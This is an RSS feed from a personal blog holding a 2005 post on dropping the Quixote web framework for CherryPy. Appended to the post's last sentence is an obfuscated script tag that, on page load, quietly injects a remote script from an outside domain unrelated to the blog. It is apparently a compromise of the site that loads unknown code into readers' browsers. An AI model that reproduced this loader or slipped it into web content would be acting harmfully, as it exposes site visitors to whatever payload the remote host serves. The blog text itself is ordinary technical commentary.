<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jkx@home &#187; cherrypy</title>
	<atom:link href="http://www.larsen-b.com/tags/cherrypy/feed" rel="self" type="application/rss+xml" />
	<link>http://www.larsen-b.com</link>
	<description>Titanium Exposé</description>
	<lastBuildDate>Fri, 31 Oct 2025 02:15:37 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5</generator>
		<item>
		<title>Small is beautifull: CherryPy</title>
		<link>http://www.larsen-b.com/Article/202.html</link>
		<comments>http://www.larsen-b.com/Article/202.html#comments</comments>
		<pubDate>Sun, 01 May 2005 19:35:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Misc]]></category>
		<category><![CDATA[cherrypy]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[quixote]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Today, I decided to write a new webapp (this will be out soon). I have been off since a while in the webapp developpement, so it&#8217;s a bit hard to start this new project. I decided to look on recent &#8230; <a href="http://www.larsen-b.com/Article/202.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>Today, I decided to write a new webapp (this will be out soon). I have been off since a while in the webapp developpement, so it&#8217;s a bit hard to start this new project.</p>
<p>I decided to look on recent Quixote&#8217;s developpement on <a class="reference" href="http://svn.pythonfr.org/public/alinea/">Alinea</a>. I first used the same components.. after 2 hours.. nothing works :</p>
<ul class="simple">
<li>issues with session management, not really hard to fix</li>
<li>big trouble with _q_traversal, _q_index .. I really hate this stuff. I don&#8217;t really understand why quixote have a so complicated framework.</li>
</ul>
<p>After 2 hours, I switched to something more friendly: <a class="reference" href="http://www.cherrypy.org">CherryPy</a> in 10 minutes I have the base working. I really like the way you can use medusa or mod_scgi in Quixote, but Webware, CherryPy, Zope have some simple components for sessions, and url handling: And this is so hard in Quixote :(<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/202.html/feed</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
	</channel>
</rss>
